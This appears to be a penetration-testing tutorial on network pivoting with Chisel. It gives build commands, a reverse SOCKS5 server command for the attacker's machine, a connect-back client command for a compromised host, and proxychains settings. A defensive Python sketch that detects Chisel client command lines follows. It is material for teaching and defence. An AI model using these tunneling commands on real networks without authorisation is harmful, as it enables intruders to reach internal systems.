Chisel

Master Tunneling


The methods discussed in the previous sections are either restricted to creating a pivot to a single port/service, or they provide dynamic port forwarding only when the intermediate (compromised) machine is a Linux machine, using proxychains and SSH.

Chisel comes in handy when the intermediate system is Windows, and it works equally well with a Linux system.

Building Chisel

Chisel source code is available on GitHub and can be downloaded and compiled for Windows or Linux. Here are the steps to build Chisel.

Clone the Chisel repository with the following commands,

sudo git clone https://github.com/jpillora/chisel.git /opt/chisel
cd /opt/chisel

Next, we compile it for Windows using Go. If you don't have Go installed, see "How to Install GoLang on Kali Linux" in the links at the end of this page.

Use the following command to create an executable,

GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" .

Next, we can use Go again to build for Linux using the following command,

go build -ldflags="-s -w" .

Download Binary

If you are having trouble building it yourself, the executables can be downloaded from the Chisel releases page on GitHub (Release v1.7.3 · jpillora/chisel, listed in the links at the end of this page).

Creating a Tunnel

The following commands set up dynamic port forwarding, meaning that through this tunnel you will be able to access any system and any port using proxychains and Chisel.

On the attacker system (Kali),

./chisel server -p 8080 --socks5 --reverse

Don't forget to transfer the binary to the target system, then run the client there so it connects back to the server,

chisel client 192.168.49.100:8080 R:socks

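With R:socks, the Chisel server listens for SOCKS5 connections on 127.0.0.1:1080 by default, so proxychains has to point at that address. Make the following changes in the proxychains config file, which can be located in "/etc/proxychains.conf" or "/etc/proxychains4.conf" (the config filename can differ based on the version),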

[ProxyList]
socks5 127.0.0.1 1080

Now you can test connecting to any system that you like using proxychains,

proxychains -q telnet 192.178.100.100 80
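From the defender's side, the client command above has a recognisable argument shape: the `client` keyword, a `host:port` server, then one or more remotes such as `R:socks`. The following Python sketch is an added example, not part of the original page or the Chisel project; it flags that shape in process command lines regardless of the executable's file name, and the host names and log records in it are constructed for illustration.

```python
import re

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE = [
    ("ws01", "chisel client 192.168.49.100:8080 R:socks"),
    ("ws02", r"C:\Users\Public\svc.exe client 192.168.49.100:8080 R:socks"),
    ("db01", "/tmp/c client 192.168.49.100:8080 R:2222:localhost:22"),
    ("ws03", "backup-agent client 10.0.0.5:9000"),   # benign: no remote spec
    ("ws04", "ssh -L 8080:localhost:80 user@jump"),  # benign: no client keyword
]

# Server argument: optional scheme, then host:port.
SERVER_RE = re.compile(r"^(?:https?://)?[\w.\-]+:\d{1,5}$")
# Remote argument: optional "R:" (reverse), up to three "field:" parts,
# then a port or the keyword "socks", optionally "/tcp" or "/udp".
REMOTE_RE = re.compile(
    r"^(?P<rev>R:)?(?:[\w.\-]+:){0,3}(?P<last>socks|\d{1,5})(?:/(?:tcp|udp))?$")

def classify(cmdline):
    """Return a finding dict if cmdline has the chisel-client shape, else None."""
    argv = cmdline.split()
    if "client" not in argv:
        return None
    # Positional arguments after "client"; option flags are skipped.
    args = [a for a in argv[argv.index("client") + 1:] if not a.startswith("-")]
    server = next((a for a in args if SERVER_RE.match(a)), None)
    if server is None:
        return None
    remotes = [m for a in args[args.index(server) + 1:]
               if (m := REMOTE_RE.match(a))]
    if not remotes:
        return None  # chisel needs at least one remote, so this is something else
    reverse = any(m["rev"] for m in remotes)
    socks = any(m["last"] == "socks" for m in remotes)
    kind = ("reverse-" if reverse else "forward-") + ("socks" if socks else "port")
    return {"server": server, "remotes": [m.group(0) for m in remotes], "kind": kind}

def scan(records):
    """Return (host, finding) for every record that matches."""
    return [(host, f) for host, cmd in records if (f := classify(cmd))]

if __name__ == "__main__":
    for host, f in scan(SAMPLE):
        print(host, f["kind"], f["server"], " ".join(f["remotes"]))
```

A `reverse-socks` finding is the highest-priority case, since it means the host has opened a general-purpose proxy into its network for an outside server.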

Links

How to Install GoLang on Kali Linux (Kali Linux Tutorial)
Release v1.7.3 · jpillora/chisel (GitHub)
Tunneling with Chisel and SSF (0xdf hacks stuff)